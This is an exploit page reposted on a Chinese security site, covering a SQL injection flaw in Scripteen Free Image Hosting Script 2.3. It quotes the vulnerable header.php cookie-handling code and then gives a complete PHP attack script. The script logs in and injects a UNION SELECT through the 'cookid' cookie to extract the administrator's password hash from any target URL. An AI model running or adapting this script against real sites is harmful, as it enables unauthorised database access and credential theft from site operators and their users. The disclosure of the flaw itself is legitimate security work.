首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Scripteen Free Image Hosting Script 2.3 SQL Injection Exploit
来源:www.vfcocus.net 作者:Coksnuss 发布时间:2009-07-27  

===================
Scripteen Free Image Hosting Script v2.3 SQL Injection vulnerable
===================

The vulnerable: header.php (line 53-62)

 $userid=$_SESSION['userid'];
 $usergid=$_SESSION['usergid'];
 if (!$userid || empty($userid) || $userid==""){
      $userid = $_COOKIE['cookid'];
 }
 if (!$usergid || empty($usergid) || $usergid==""){
      $usergid = $_COOKIE['cookgid'];
 }

As you can see $_COOKIE['cookid'] and $_COOKIE['cookgid'] is not filtered and can be used to do an SQL Injection

===================
Proof of concept
===================
<?php
// *************************************
// Global variables
// *************************************
$g_arguments = getArguments();
$g_url  = isset($g_arguments['url']) ? $g_arguments['url'] : false;
$g_username = isset($g_arguments['username']) ? $g_arguments['username'] : false;
$g_password = isset($g_arguments['password']) ? $g_arguments['password'] : false;
// *************************************

// *************************************
// Print help
// *************************************
if(isset($g_arguments['help']) || $g_url === false || $g_username === false || $g_password === false)
{
 echo "###################################\n";
 echo "#                                  \n";
 echo "# Scripteen Free Image Hosting V2.3\n";
 echo "#      SQL Injection Exploit       \n";
 echo "#      Discovered by Coksnuss      \n";
 echo "#      POC script by Coksnuss      \n";
 echo "#                                  \n";
 echo "###################################\n";
 
 echo "Usage: " . $argv[0] . "\n";
 echo "\t--help - This help\n";
 echo "\t--url=[STR] - URL of a vulnerable site (e.g. http://www.host.de/path/to/script)\n";
 echo "\t--username=[STR] - A valid username to login\n";
 echo "\t--password=[STR] - A valid password to login\n";
 die();
}
// *************************************


// *************************************
// Main
// *************************************
$url = strpos($g_url, '.php') !== false ? dirname($g_url) : $g_url;
if(substr($url, -1, 1) == '/' ) $url = substr($url, 0, -1);

// Get Cookie
echo "Generate cookie...";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,  $g_url . '/login.php');
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_COOKIEJAR, dirname(__FILE__) . DIRECTORY_SEPARATOR . 'cookie.txt');
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, 'uname=' . urlencode($g_username) . '&pass=' . urlencode($g_password));

$ret = curl_exec($curl);
curl_close($curl);

preg_match_all('/([\d]{1}[.][\d]{1})/', $ret, $matches);
if(!array_search('2.3', $matches[1]))
 echo("\nWarning: It seems like this site do not use version 2.3 of the Scripteen Free Image Hosting Script!\n");

if(!file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR . 'cookie.txt'))
 die('Be sure that you\'ve enabled CURL and have write permission in the script directory!');

echo "DONE\n";

// Get userid
echo "Get userid...";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,  $g_url . '/profile.php');
curl_setopt($curl, CURLOPT_COOKIEFILE, dirname(__FILE__) . DIRECTORY_SEPARATOR . 'cookie.txt');
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

$ret = curl_exec($curl);
curl_close($curl);

if(!preg_match('/<input type="hidden" name="userid" id="userid" value="([\d]{1,3})"/', $ret, $match))
 die('Couldn\'t retrieve userid! Check your login data again!');

$userid = $match[1];
echo "DONE (" . $userid . ")\n";

// Get the password hash from userid 1
echo "Get the passwordhash from userid 1...\n";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,  $g_url . '/profile.php');
curl_setopt($curl, CURLOPT_COOKIE, 'cookid=' . $userid . ' UNION SELECT 1,2,password,4,5,6,7,8,9,10,11 FROM users WHERE userid=1; cookgid=3; cookname=' . urlencode($g_username) . '; cookpass=' . md5($g_password));
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

$ret = curl_exec($curl);
curl_close($curl);

if(!preg_match('/<input type="text" name="uname" id="uname" value="([a-z0-9]{32})"/', $ret, $match))
 die('Couldn\'t find the password hash!');

echo "Hash found: " . $match[1] . "\n";
// *************************************


// *************************************
// Global functions
// *************************************
function getArguments()
{
 global $argv;
 
 foreach($argv as $arg)
 {
  if(substr($arg, 0, 2) == '--')
  {
   // In case its an arguments (e.g. --arg='1')
   if(($pos = strpos($arg, '=')) !== false)
   {
    $name = substr($arg, 2, ($pos - 2));
    $value = substr($arg, ($pos + 1));
    
    $args[$name] = $value;
   // Or just a flag (e.g. --help)
   } else {
    $name = substr($arg, 2);
    
    $args[$name] = true;
   }
  } else if($arg == $argv[0]) {
   $args[0] = $argv[0];
  }
 }
 
 return $args;
}
// *************************************
?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Wordpress 2.8.1 (url) Remote C
·MS Internet Explorer 7/8 findT
·Mozilla Firefox 3.5 (Font tags
·Pixaria Gallery 2.3.5 (file) R
·PHP Live! 3.2.1/2 (x) Remote B
·Oracle version 11.1.0.6.0 win3
·WzdFTPD <= 8.0 Remote Denial o
·The Network Foundation compone
·Ekiga 2.0.5 (GetHostAddress) R
·Mysql5crack Tool
·OpenH323 Opal SIP Protocol Rem
·The my_gallery version 2.4.1 p
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved